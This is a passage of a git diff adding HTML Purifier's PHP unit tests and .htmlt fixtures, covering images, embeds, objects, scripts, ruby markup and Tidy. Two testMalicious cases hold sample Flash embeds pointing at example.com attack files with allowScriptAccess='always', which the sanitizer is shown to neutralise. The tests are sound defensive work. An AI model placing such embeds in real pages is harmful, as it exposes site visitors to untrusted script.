$this->assertResult( + '<img height="30" width="30" src="" alt="" />', + '<img height="20" width="20" src="" alt="" />' + ); + } + + function testLengthCrashFixDisabled() { + $this->config->set('HTML.MaxImgLength', null); + $this->assertResult( + '<img height="100%" width="100%" src="" alt="" />' + ); + $this->assertResult( + '<img height="40000" width="40000" src="" alt="" />' + ); + } + + function testLengthTrusted() { + $this->config->set('HTML.Trusted', true); + $this->assertResult( + '<img height="100%" width="100%" src="" alt="" />' + ); + $this->assertResult( + '<img height="40000" width="40000" src="" alt="" />' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/NameTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/NameTest.php new file mode 100644 index 000000000..9152710bd --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/NameTest.php @@ -0,0 +1,32 @@ +<?php + +class HTMLPurifier_HTMLModule_NameTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + } + + function testBasicUse() { + $this->config->set('Attr.EnableID', true); + $this->assertResult( + '<a name="foo">bar</a>' + ); + } + + function testCDATA() { + $this->config->set('HTML.Attr.Name.UseCDATA', true); + $this->assertResult( + '<a name="2">Baz</a><a name="2">Bar</a>' + ); + } + + function testCDATAWithHeavyTidy() { + $this->config->set('HTML.Attr.Name.UseCDATA', true); + $this->config->set('HTML.TidyLevel', 'heavy'); + $this->assertResult('<a name="2">Baz</a>'); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/NofollowTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/NofollowTest.php new file mode 100644 index 000000000..43084de3a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/NofollowTest.php @@ -0,0 +1,26 @@ +<?php + +class HTMLPurifier_HTMLModule_NofollowTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $this->config->set('HTML.Nofollow', true); + } + + function testNofollow() { + $this->assertResult( + '<a href="http://google.com">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>', + '<a href="http://google.com" rel="nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' + ); + } + + function testNofollowDupe() { + $this->assertResult( + '<a href="http://google.com" rel="nofollow">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ObjectTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ObjectTest.php new file mode 100644 index 000000000..f824d6021 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ObjectTest.php @@ -0,0 +1,38 @@ +<?php + +class HTMLPurifier_HTMLModule_ObjectTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $this->config->set('HTML.Trusted', true); + } + + function testDefaultRemoval() { + $this->config->set('HTML.Trusted', false); + $this->assertResult( + '<object></object>', '' + ); + } + + function testMinimal() { + $this->assertResult('<object></object>'); + } + + function testStandardUseCase() { + $this->assertResult( +'<object type="video/x-ms-wmv" data="http://domain.com/video.wmv" width="320" height="256"> +<param name="src" value="http://domain.com/video.wmv" /> +<param name="autostart" value="false" /> +<param name="controller" value="true" /> +<param name="pluginurl" value="http://www.microsoft.com/Windows/MediaPlayer/" /> +<a href="http://www.microsoft.com/Windows/MediaPlayer/">Windows Media player required</a> +</object>' + ); + } + + // more test-cases? + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ProprietaryTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ProprietaryTest.php new file mode 100644 index 000000000..21ebe8a5b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ProprietaryTest.php @@ -0,0 +1,30 @@ +<?php + +class HTMLPurifier_HTMLModule_ProprietaryTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $this->config->set('HTML.Proprietary', true); + } + + function testMarquee() { + $this->assertResult( + '<span><marquee + width="20%" + height="34" + direction="left" + behavior="alternate" + scrolldelay="3" + scrollamount="5" + loop="4" + bgcolor="#FF0000" + hspace="5" + vspace="3" + ><div>Block</div><span>Inline</span>Text</marquee></span>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/RubyTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/RubyTest.php new file mode 100644 index 000000000..23a1400d0 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/RubyTest.php @@ -0,0 +1,55 @@ +<?php + +class HTMLPurifier_HTMLModule_RubyTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $this->config->set('HTML.Doctype', 'XHTML 1.1'); + } + + function testBasicUse() { + $this->assertResult( + '<ruby><rb>WWW</rb><rt>World Wide Web</rt></ruby>' + ); + } + + function testRPUse() { + $this->assertResult( + '<ruby><rb>WWW</rb><rp>(</rp><rt>World Wide Web</rt><rp>)</rp></ruby>' + ); + } + + function testComplexUse() { + $this->assertResult( +'<ruby> + <rbc> + <rb>10</rb> + <rb>31</rb> + <rb>2002</rb> + </rbc> + <rtc> + <rt>Month</rt> + <rt>Day</rt> + <rt>Year</rt> + </rtc> + <rtc> + <rt rbspan="3">Expiration Date</rt> + </rtc> +</ruby>' + ); + + /* not implemented + function testBackwardsCompat() { + $this->assertResult( + '<ruby>A<rp>(</rp><rt>aaa</rt><rp>)</rp></ruby>', + '<ruby><rb>A</rb><rp>(</rp><rt>aaa</rt><rp>)</rp></ruby>' + ); + } + */ + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/SafeEmbedTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/SafeEmbedTest.php new file mode 100644 index 000000000..779d34857 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/SafeEmbedTest.php @@ -0,0 +1,41 @@ +<?php + +class HTMLPurifier_HTMLModule_SafeEmbedTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $def = $this->config->getHTMLDefinition(true); + $def->manager->addModule('SafeEmbed'); + } + + function testMinimal() { + $this->assertResult( + '<embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" />', + '<embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" allowscriptaccess="never" allownetworking="internal" type="application/x-shockwave-flash" />' + ); + } + + function testYouTube() { + $this->assertResult( + '<embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed>', + '<embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344" allowscriptaccess="never" allownetworking="internal" />' + ); + } + + function testMalicious() { + $this->assertResult( + '<embed src="http://example.com/bad.swf" type="application/x-shockwave-flash" width="9999999" height="3499994" allowscriptaccess="always" allownetworking="always" />', + '<embed src="http://example.com/bad.swf" type="application/x-shockwave-flash" width="1200" height="1200" allowscriptaccess="never" allownetworking="internal" />' + ); + } + + function testFull() { + $this->assertResult( + '<b><embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="24" height="23" allowscriptaccess="never" allownetworking="internal" wmode="window" /></b>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/SafeObjectTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/SafeObjectTest.php new file mode 100644 index 000000000..d8a23d50f --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/SafeObjectTest.php @@ -0,0 +1,49 @@ +<?php + +class HTMLPurifier_HTMLModule_SafeObjectTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $this->config->set('HTML.DefinitionID', 'HTMLPurifier_HTMLModule_SafeObjectTest'); + $this->config->set('HTML.SafeObject', true); + } + + function testMinimal() { + $this->assertResult( + '<object></object>', + '<object type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /></object>' + ); + } + + function testYouTube() { + // embed is purposely removed + $this->assertResult( + '<object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/RVtEQxH7PWA&hl=en"></param><embed src="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash" width="425" height="344"></embed></object>', + '<object width="425" height="344" data="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" /></object>' + ); + } + + function testMalicious() { + $this->assertResult( + '<object width="9999999" height="9999999"><param name="allowScriptAccess" value="always" /><param name="movie" value="http://example.com/attack.swf" /></object>', + '<object width="1200" height="1200" data="http://example.com/attack.swf" type="application/x-shockwave-flash"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="movie" value="http://example.com/attack.swf" /></object>' + ); + } + + function testFull() { + $this->assertResult( + '<b><object width="425" height="344" type="application/x-shockwave-flash" data="Foobar"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="flashvars" value="foobarbaz=bally" /><param name="movie" value="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" /><param name="wmode" value="window" /></object></b>' + ); + } + + function testFullScreen() { + $this->config->set('HTML.FlashAllowFullScreen', true); + $this->assertResult( + '<b><object width="425" height="344" type="application/x-shockwave-flash" data="Foobar"><param name="allowScriptAccess" value="never" /><param name="allowNetworking" value="internal" /><param name="flashvars" value="foobarbaz=bally" /><param name="movie" value="http://www.youtube.com/v/RVtEQxH7PWA&hl=en" /><param name="wmode" value="window" /><param name="allowFullScreen" value="true" /></object></b>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ScriptingTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ScriptingTest.php new file mode 100644 index 000000000..c844a4776 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/ScriptingTest.php @@ -0,0 +1,55 @@ +<?php + +class HTMLPurifier_HTMLModule_ScriptingTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $this->config->set('HTML.Trusted', true); + $this->config->set('Output.CommentScriptContents', false); + } + + function testDefaultRemoval() { + $this->config->set('HTML.Trusted', false); + $this->assertResult( + '<script type="text/javascript">foo();</script>', '' + ); + } + + function testPreserve() { + $this->assertResult( + '<script type="text/javascript">foo();</script>' + ); + } + + function testCDATAEnclosure() { + $this->assertResult( +'<script type="text/javascript">//<![CDATA[ +alert("<This is compatible with XHTML>"); +//]]></script>' + ); + } + + function testAllAttributes() { + $this->assertResult( + '<script + defer="defer" + src="test.js" + type="text/javascript" + >PCDATA</script>' + ); + } + + function testUnsupportedAttributes() { + $this->assertResult( + '<script + type="text/javascript" + charset="utf-8" + >PCDATA</script>', + '<script type="text/javascript">PCDATA</script>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/TargetBlankTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/TargetBlankTest.php new file mode 100644 index 000000000..a757fecb3 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/TargetBlankTest.php @@ -0,0 +1,20 @@ +<?php + +class HTMLPurifier_HTMLModule_TargetBlankTest extends HTMLPurifier_HTMLModuleHarness +{ + + function setUp() { + parent::setUp(); + $this->config->set('HTML.TargetBlank', true); + } + + function testTargetBlank() { + $this->assertResult( + '<a href="http://google.com">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>', + '<a href="http://google.com" target="blank">a</a><a href="/local">b</a><a href="mailto:foo@example.com">c</a>' + ); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/TidyTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/TidyTest.php new file mode 100644 index 000000000..e80aeb16d --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModule/TidyTest.php @@ -0,0 +1,224 @@ +<?php + +Mock::generatePartial( + 'HTMLPurifier_HTMLModule_Tidy', + 'HTMLPurifier_HTMLModule_Tidy_TestForConstruct', + array('makeFixes', 'makeFixesForLevel', 'populate') +); + +class HTMLPurifier_HTMLModule_TidyTest extends HTMLPurifier_Harness +{ + + function test_getFixesForLevel() { + + $module = new HTMLPurifier_HTMLModule_Tidy(); + $module->fixesForLevel['light'][] = 'light-fix'; + $module->fixesForLevel['medium'][] = 'medium-fix'; + $module->fixesForLevel['heavy'][] = 'heavy-fix'; + + $this->assertIdentical( + array(), + $module->getFixesForLevel('none') + ); + $this->assertIdentical( + array('light-fix' => true), + $module->getFixesForLevel('light') + ); + $this->assertIdentical( + array('light-fix' => true, 'medium-fix' => true), + $module->getFixesForLevel('medium') + ); + $this->assertIdentical( + array('light-fix' => true, 'medium-fix' => true, 'heavy-fix' => true), + $module->getFixesForLevel('heavy') + ); + + $this->expectError('Tidy level turbo not recognized'); + $module->getFixesForLevel('turbo'); + + } + + function test_setup() { + + $i = 0; // counter, helps us isolate expectations + + // initialize partial mock + $module = new HTMLPurifier_HTMLModule_Tidy_TestForConstruct(); + $module->fixesForLevel['light'] = array('light-fix-1', 'light-fix-2'); + $module->fixesForLevel['medium'] = array('medium-fix-1', 'medium-fix-2'); + $module->fixesForLevel['heavy'] = array('heavy-fix-1', 'heavy-fix-2'); + + $j = 0; + $fixes = array( + 'light-fix-1' => $lf1 = $j++, + 'light-fix-2' => $lf2 = $j++, + 'medium-fix-1' => $mf1 = $j++, + 'medium-fix-2' => $mf2 = $j++, + 'heavy-fix-1' => $hf1 = $j++, + 'heavy-fix-2' => $hf2 = $j++ + ); + $module->setReturnValue('makeFixes', $fixes); + + $config = HTMLPurifier_Config::create(array( + 'HTML.TidyLevel' => 'none' + )); + $module->expectAt($i++, 'populate', array(array())); + $module->setup($config); + + // basic levels + + $config = HTMLPurifier_Config::create(array( + 'HTML.TidyLevel' => 'light' + )); + $module->expectAt($i++, 'populate', array(array( + 'light-fix-1' => $lf1, + 'light-fix-2' => $lf2 + ))); + $module->setup($config); + + $config = HTMLPurifier_Config::create(array( + 'HTML.TidyLevel' => 'heavy' + )); + $module->expectAt($i++, 'populate', array(array( + 'light-fix-1' => $lf1, + 'light-fix-2' => $lf2, + 'medium-fix-1' => $mf1, + 'medium-fix-2' => $mf2, + 'heavy-fix-1' => $hf1, + 'heavy-fix-2' => $hf2 + ))); + $module->setup($config); + + // fine grained tuning + + $config = HTMLPurifier_Config::create(array( + 'HTML.TidyLevel' => 'none', + 'HTML.TidyAdd' => array('light-fix-1', 'medium-fix-1') + )); + $module->expectAt($i++, 'populate', array(array( + 'light-fix-1' => $lf1, + 'medium-fix-1' => $mf1 + ))); + $module->setup($config); + + $config = HTMLPurifier_Config::create(array( + 'HTML.TidyLevel' => 'medium', + 'HTML.TidyRemove' => array('light-fix-1', 'medium-fix-1') + )); + $module->expectAt($i++, 'populate', array(array( + 'light-fix-2' => $lf2, + 'medium-fix-2' => $mf2 + ))); + $module->setup($config); + + } + + function test_makeFixesForLevel() { + + $module = new HTMLPurifier_HTMLModule_Tidy(); + $module->defaultLevel = 'heavy'; + + $module->makeFixesForLevel(array( + 'fix-1' => 0, + 'fix-2' => 1, + 'fix-3' => 2 + )); + + $this->assertIdentical($module->fixesForLevel['heavy'], array('fix-1', 'fix-2', 'fix-3')); + $this->assertIdentical($module->fixesForLevel['medium'], array()); + $this->assertIdentical($module->fixesForLevel['light'], array()); + + } + function test_makeFixesForLevel_undefinedLevel() { + + $module = new HTMLPurifier_HTMLModule_Tidy(); + $module->defaultLevel = 'bananas'; + + $this->expectError('Default level bananas does not exist'); + + $module->makeFixesForLevel(array( + 'fix-1' => 0 + )); + + } + + function test_getFixType() { + + // syntax needs documenting + + $module = new HTMLPurifier_HTMLModule_Tidy(); + + $this->assertIdentical( + $module->getFixType('a'), + array('tag_transform', array('element' => 'a')) + ); + + $this->assertIdentical( + $module->getFixType('a@href'), + $reuse = array('attr_transform_pre', array('element' => 'a', 'attr' => 'href')) + ); + + $this->assertIdentical( + $module->getFixType('a@href#pre'), + $reuse + ); + + $this->assertIdentical( + $module->getFixType('a@href#post'), + array('attr_transform_post', array('element' => 'a', 'attr' => 'href')) + ); + + $this->assertIdentical( + $module->getFixType('xml:foo@xml:bar'), + array('attr_transform_pre', array('element' => 'xml:foo', 'attr' => 'xml:bar')) + ); + + $this->assertIdentical( + $module->getFixType('blockquote#child'), + array('child', array('element' => 'blockquote')) + ); + + $this->assertIdentical( + $module->getFixType('@lang'), + array('attr_transform_pre', array('attr' => 'lang')) + ); + + $this->assertIdentical( + $module->getFixType('@lang#post'), + array('attr_transform_post', array('attr' => 'lang')) + ); + + } + + function test_populate() { + + $i = 0; + + $module = new HTMLPurifier_HTMLModule_Tidy(); + $module->populate(array( + 'element' => $element = $i++, + 'element@attr' => $attr = $i++, + 'element@attr#post' => $attr_post = $i++, + 'element#child' => $child = $i++, + 'element#content_model_type' => $content_model_type = $i++, + '@attr' => $global_attr = $i++, + '@attr#post' => $global_attr_post = $i++ + )); + + $module2 = new HTMLPurifier_HTMLModule_Tidy(); + $e = $module2->addBlankElement('element'); + $e->attr_transform_pre['attr'] = $attr; + $e->attr_transform_post['attr'] = $attr_post; + $e->child = $child; + $e->content_model_type = $content_model_type; + $module2->info_tag_transform['element'] = $element; + $module2->info_attr_transform_pre['attr'] = $global_attr; + $module2->info_attr_transform_post['attr'] = $global_attr_post; + + $this->assertEqual($module, $module2); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleHarness.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleHarness.php new file mode 100644 index 000000000..7aadf468a --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleHarness.php @@ -0,0 +1,11 @@ +<?php + +class HTMLPurifier_HTMLModuleHarness extends HTMLPurifier_StrategyHarness +{ + function setup() { + parent::setup(); + $this->obj = new HTMLPurifier_Strategy_Core(); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleManagerTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleManagerTest.php new file mode 100644 index 000000000..2750f8924 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleManagerTest.php @@ -0,0 +1,120 @@ +<?php + +class HTMLPurifier_HTMLModuleManagerTest extends HTMLPurifier_Harness +{ + + protected function createManager() { + $manager = new HTMLPurifier_HTMLModuleManager(); + + $this->config->set('HTML.CustomDoctype', 'Blank'); + $manager->doctypes->register('Blank'); + + $attrdef_nmtokens = new HTMLPurifier_AttrDef_HTML_Nmtokens(); + + generate_mock_once('HTMLPurifier_AttrDef'); + $attrdef = new HTMLPurifier_AttrDefMock(); + $attrdef->setReturnValue('make', $attrdef_nmtokens); + $manager->attrTypes->set('NMTOKENS', $attrdef); + return $manager; + } + + function test_addModule() { + + $manager = $this->createManager(); + + // ...but we add user modules + + $common_module = new HTMLPurifier_HTMLModule(); + $common_module->name = 'Common'; + $common_module->attr_collections['Common'] = array('class' => 'NMTOKENS'); + $common_module->content_sets['Flow'] = 'Block | Inline'; + $manager->addModule($common_module); + + $structural_module = new HTMLPurifier_HTMLModule(); + $structural_module->name = 'Structural'; + $structural_module->addElement('p', 'Block', 'Inline', 'Common'); + $manager->addModule($structural_module); + + $formatting_module = new HTMLPurifier_HTMLModule(); + $formatting_module->name = 'Formatting'; + $formatting_module->addElement('em', 'Inline', 'Inline', 'Common'); + $manager->addModule($formatting_module); + + $unsafe_module = new HTMLPurifier_HTMLModule(); + $unsafe_module->name = 'Unsafe'; + $unsafe_module->safe = false; + $unsafe_module->addElement('div', 'Block', 'Flow'); + $manager->addModule($unsafe_module); + + $config = HTMLPurifier_Config::createDefault(); + $config->set('HTML.Trusted', false); + $config->set('HTML.CustomDoctype', 'Blank'); + + $manager->setup($config); + + $attrdef_nmtokens = new HTMLPurifier_AttrDef_HTML_Nmtokens(); + + $p = new HTMLPurifier_ElementDef(); + $p->attr['class'] = $attrdef_nmtokens; + $p->child = new HTMLPurifier_ChildDef_Optional(array('em', '#PCDATA')); + $p->content_model = 'em | #PCDATA'; + $p->content_model_type = 'optional'; + $p->descendants_are_inline = true; + + $em = new HTMLPurifier_ElementDef(); + $em->attr['class'] = $attrdef_nmtokens; + $em->child = new HTMLPurifier_ChildDef_Optional(array('em', '#PCDATA')); + $em->content_model = 'em | #PCDATA'; + $em->content_model_type = 'optional'; + $em->descendants_are_inline = true; + + $this->assertEqual( + array('p' => $p, 'em' => $em), + $manager->getElements() + ); + + // test trusted parameter override + + $div = new HTMLPurifier_ElementDef(); + $div->child = new HTMLPurifier_ChildDef_Optional(array('p', 'div', 'em', '#PCDATA')); + $div->content_model = 'p | div | em | #PCDATA'; + $div->content_model_type = 'optional'; + $div->descendants_are_inline = false; + + $this->assertEqual($div, $manager->getElement('div', true)); + + } + + function testAllowedModules() { + + $manager = new HTMLPurifier_HTMLModuleManager(); + $manager->doctypes->register( + 'Fantasy Inventory 1.0', true, + array('Weapons', 'Magic') + ); + + // register these modules so it doesn't blow up + $weapons_module = new HTMLPurifier_HTMLModule(); + $weapons_module->name = 'Weapons'; + $manager->registerModule($weapons_module); + + $magic_module = new HTMLPurifier_HTMLModule(); + $magic_module->name = 'Magic'; + $manager->registerModule($magic_module); + + $config = HTMLPurifier_Config::create(array( + 'HTML.CustomDoctype' => 'Fantasy Inventory 1.0', + 'HTML.AllowedModules' => 'Weapons' + )); + $manager->setup($config); + + $this->assertTrue( isset($manager->modules['Weapons'])); + $this->assertFalse(isset($manager->modules['Magic'])); + + } + + + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleTest.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleTest.php new file mode 100644 index 000000000..65220f08b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLModuleTest.php @@ -0,0 +1,146 @@ +<?php + +class HTMLPurifier_HTMLModuleTest extends HTMLPurifier_Harness +{ + + function test_addElementToContentSet() { + + $module = new HTMLPurifier_HTMLModule(); + + $module->addElementToContentSet('b', 'Inline'); + $this->assertIdentical($module->content_sets, array('Inline' => 'b')); + + $module->addElementToContentSet('i', 'Inline'); + $this->assertIdentical($module->content_sets, array('Inline' => 'b | i')); + + } + + function test_addElement() { + + $module = new HTMLPurifier_HTMLModule(); + $def = $module->addElement( + 'a', 'Inline', 'Optional: #PCDATA', array('Common'), + array( + 'href' => 'URI' + ) + ); + + $module2 = new HTMLPurifier_HTMLModule(); + $def2 = new HTMLPurifier_ElementDef(); + $def2->content_model = '#PCDATA'; + $def2->content_model_type = 'optional'; + $def2->attr = array( + 'href' => 'URI', + 0 => array('Common') + ); + $module2->info['a'] = $def2; + $module2->elements = array('a'); + $module2->content_sets['Inline'] = 'a'; + + $this->assertIdentical($module, $module2); + $this->assertIdentical($def, $def2); + $this->assertReference($def, $module->info['a']); + + } + + function test_parseContents() { + + $module = new HTMLPurifier_HTMLModule(); + + // pre-defined templates + $this->assertIdentical( + $module->parseContents('Inline'), + array('optional', 'Inline | #PCDATA') + ); + $this->assertIdentical( + $module->parseContents('Flow'), + array('optional', 'Flow | #PCDATA') + ); + $this->assertIdentical( + $module->parseContents('Empty'), + array('empty', '') + ); + + // normalization procedures + $this->assertIdentical( + $module->parseContents('optional: a'), + array('optional', 'a') + ); + $this->assertIdentical( + $module->parseContents('OPTIONAL :a'), + array('optional', 'a') + ); + $this->assertIdentical( + $module->parseContents('Optional: a'), + array('optional', 'a') + ); + + // others + $this->assertIdentical( + $module->parseContents('Optional: a | b | c'), + array('optional', 'a | b | c') + ); + + // object pass-through + generate_mock_once('HTMLPurifier_AttrDef'); + $this->assertIdentical( + $module->parseContents(new HTMLPurifier_AttrDefMock()), + array(null, null) + ); + + } + + function test_mergeInAttrIncludes() { + + $module = new HTMLPurifier_HTMLModule(); + + $attr = array(); + $module->mergeInAttrIncludes($attr, 'Common'); + $this->assertIdentical($attr, array(0 => array('Common'))); + + $attr = array('a' => 'b'); + $module->mergeInAttrIncludes($attr, array('Common', 'Good')); + $this->assertIdentical($attr, array('a' => 'b', 0 => array('Common', 'Good'))); + + } + + function test_addBlankElement() { + + $module = new HTMLPurifier_HTMLModule(); + $def = $module->addBlankElement('a'); + + $def2 = new HTMLPurifier_ElementDef(); + $def2->standalone = false; + + $this->assertReference($module->info['a'], $def); + $this->assertIdentical($def, $def2); + + } + + function test_makeLookup() { + + $module = new HTMLPurifier_HTMLModule(); + + $this->assertIdentical( + $module->makeLookup('foo'), + array('foo' => true) + ); + $this->assertIdentical( + $module->makeLookup(array('foo')), + array('foo' => true) + ); + + $this->assertIdentical( + $module->makeLookup('foo', 'two'), + array('foo' => true, 'two' => true) + ); + $this->assertIdentical( + $module->makeLookup(array('foo', 'two')), + array('foo' => true, 'two' => true) + ); + + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT.php b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT.php new file mode 100644 index 000000000..06e7958fb --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT.php @@ -0,0 +1,33 @@ +<?php + +class HTMLPurifier_HTMLT extends HTMLPurifier_Harness +{ + protected $path; + + public function __construct($path) { + $this->path = $path; + parent::__construct($path); + } + + public function testHtmlt() { + $parser = new HTMLPurifier_StringHashParser(); + $hash = $parser->parseFile($this->path); // assume parser normalizes to "\n" + if (isset($hash['SKIPIF'])) { + if (eval($hash['SKIPIF'])) return; + } + $this->config->set('Output.Newline', "\n"); + if (isset($hash['INI'])) { + // there should be a more efficient way than writing another + // ini file every time... probably means building a parser for + // ini (check out the yaml implementation we saw somewhere else) + $ini_file = $this->path . '.ini'; + file_put_contents($ini_file, $hash['INI']); + $this->config->loadIni($ini_file); + } + $expect = isset($hash['EXPECT']) ? $hash['EXPECT'] : $hash['HTML']; + $this->assertPurification(rtrim($hash['HTML']), rtrim($expect)); + if (isset($hash['INI'])) unlink($ini_file); + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/allowed-preserve.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/allowed-preserve.htmlt new file mode 100644 index 000000000..650f00b6b --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/allowed-preserve.htmlt @@ -0,0 +1,8 @@ +--INI-- +HTML.AllowedElements = b,i,p,a +HTML.AllowedAttributes = a.href,*.id +--HTML-- +<p>Par.</p> +<p>Para<a href="http://google.com/">gr</a>aph</p> +Text<b>Bol<i>d</i></b> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/allowed-remove.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/allowed-remove.htmlt new file mode 100644 index 000000000..2b6b8eea6 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/allowed-remove.htmlt @@ -0,0 +1,8 @@ +--INI-- +HTML.AllowedElements = b,i,p,a +HTML.AllowedAttributes = a.href,*.id +--HTML-- +<span>Not allowed</span><a class="mef" id="foobar">Remove id too!</a> +--EXPECT-- +Not allowed<a>Remove id too!</a> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/basic.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/basic.htmlt new file mode 100644 index 000000000..4c1f42778 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/basic.htmlt @@ -0,0 +1,5 @@ +--HTML-- +<b>basic</b> +--EXPECT-- +<b>basic</b> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/blacklist-preserve.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/blacklist-preserve.htmlt new file mode 100644 index 000000000..d8882fe22 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/blacklist-preserve.htmlt @@ -0,0 +1,6 @@ +--INI-- +HTML.ForbiddenElements = b +HTML.ForbiddenAttributes = a@href +--HTML-- +<p>foo</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/blacklist-remove.htmlt b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/blacklist-remove.htmlt new file mode 100644 index 000000000..1b5985873 --- /dev/null +++ b/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/blacklist-remove.htmlt @@ -0,0 +1,8 @@ +--INI-- +HTML.ForbiddenElements = b +HTML.ForbiddenAttributes = a@href +--HTML-- +<b>Foo<a href="bar">bar</a></b> +--EXPECT-- +Foo<a>bar</a> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/HTMLPurifier/HTMLT/css-allowed-preserve.htmlt 